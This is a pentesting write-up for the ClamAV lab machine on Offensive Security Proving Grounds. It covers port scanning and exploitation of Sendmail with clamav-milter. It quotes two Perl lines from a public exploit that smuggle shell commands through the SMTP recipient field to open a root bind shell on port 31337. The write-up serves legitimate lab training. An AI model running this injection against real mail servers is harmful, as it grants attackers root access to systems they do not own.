👨💻
👨💻
👨💻
👨💻
Pentesting
HomeCTFsLearn
Search…
Zeyu's Pentesting Writeups
Home
CTF Writeups
My Vulnerable Website
Blog Posts
My OSCP Journey: How I Tried Harder
Proving Grounds
Warm Up
Pebbles
Twiggy
Bratarina
Internal
ClamAV
Get to Work
Try Harder
Hack the Box
Easy
Medium
Powered By GitBook
ClamAV
Writeup for ClamAV from Offensive Security Proving Grounds (PG)

Information Gathering

Service Enumeration

nmapAutomator.sh -H 192.168.66.42 -t full
nmapAutomator.sh -H 192.168.66.42 -t vulns

HTTP (80)

There is a page with a binary message.
Challenge accepted!

SMTP (25)

We can see that Sendmail 8.13.4 is used.

Exploitation

We find the following Sendmail + ClamAV RCE exploit:
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
Exploit Database
The two lines in the Perl script:
1
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
2
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
Copied!
appear to open port 31337 as a root shell.
After running the script, the port is indeed open.
Upon connecting to the bind shell, use bash -i to upgrade to a fully interactive shell.
Previous
Internal
Next - Proving Grounds
Get to Work
Last modified 1yr ago
Copy link
Contents
Information Gathering
Service Enumeration
HTTP (80)
SMTP (25)
Exploitation